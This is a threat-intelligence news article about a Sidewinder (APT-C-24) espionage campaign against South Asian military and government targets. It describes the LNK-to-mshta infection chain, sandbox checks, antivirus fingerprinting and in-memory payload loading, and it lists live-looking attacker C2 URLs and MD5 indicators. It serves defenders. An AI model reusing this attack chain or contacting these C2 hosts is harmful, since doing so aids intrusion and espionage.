In a new wave of espionage activity, APT-C-24, also known as Sidewinder or Rattlesnake, has shifted tactics to leverage Windows shortcut (.LNK) files for remote script execution.
Discovered by the 360 Advanced Threat Research Institute, the campaign targets critical South Asian infrastructure and government entities, including Nepalese and Sri Lankan military networks, by packaging three malicious LNK files within a compressed archive to maximize infection probability.
When a victim opens any of the embedded shortcuts (file 1.docx.lnk, file 2.docx.lnk, or file 3 3 3.docx.lnk), the LNK invokes mshta.exe to fetch and execute an HTML Application (HTA) from a controlled server. Each URL ends with the parameter.
yui=0, 1, or 2, distinguishing the three variants but retaining identical functionality. For example, the “file 2.docx.lnk” sample (MD5 14632adccc9620b66ac4a3c52946f8c4) directs mshta.exe to load “34016917-New_1” from https://policy.mail163cn.info/36287654-New?yui=1.
Upon execution, the HTA script unpacks an obfuscated payload into %TEMP%\file 2.docx. Rather than decoding immediately, the script defers deobfuscation to a subsequent C# downloader component.
After base64 decoding and decompression, the downloader performs environmental checks via WMI: it queries Win32_Processor for core count and only proceeds if the system has two or more cores.
A memory size check ensures the host has at least 810 MB of RAM before .NET deserialization loads the next stage into memory.
Multi-Layered Obfuscation and Environmental Safeguards
The C# downloader (MD5 2e382c82d055e6e3a5feb9095d759735) is packed with numerous anti-analysis techniques.
It surveys running processes for known security software such as Kaspersky and ESET—then appends the detected product name as a query parameter (e.g., ?p=&w=Kaspersky) to its C2 URL at https://policy.mail163cn.info/46785583-New.
Although the callback yields no visible response, this likely serves to fingerprint the victim’s antivirus environment.
If the initial payload file exists, the downloader base64-decodes and decompresses it, then launches the benign-looking document to distract the user.
Finally, it retrieves the actual follow-on payload from https://policy.mail163cn.info/08395961-NewXOR-decrypts the data and reflects it into memory. Rapid C2 rotation and regional filtering prevent researchers from capturing the full suite of tools deployed in specific target environments.
The domain selection and URL conventions, including character strings like “nepalarmy”, “army-lk”, “aliyumm”, 6- or 8-digit numeric prefixes, and the repeated use of “yui” parameters, mirror Sidewinder’s established infrastructure.
Shared IP resolutions and identical HTTP header behaviors further cement the attribution to this APT group.
Sidewinder’s evolution away from leveraging Office formula-editor exploits (e.g., CVE-2017-0199 and CVE-2017-11882) toward LNK-based script loaders underscores its commitment to maintaining stealth and versatility.
Organizations in government, energy, defense, and mining sectors must tighten endpoint defenses, enforce strict attachment-handling policies, and implement behavior-based monitoring to detect unusual mshta.exe invocations and memory-only payloads.
Continuous threat hunting and robust patch management remain essential to thwarting these sophisticated, memory-resident intrusions.
IOC
MD5:
10569403ab4e8057d560e2474bed4c4c
03aaeea52ff6bc37f87aeebf1b89db28
3a97695937d9501423f100d76af24cc1
76f6b482aa1a269e32b635aec95859ec
fb49a808ed082d5d12effda0972ae441
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
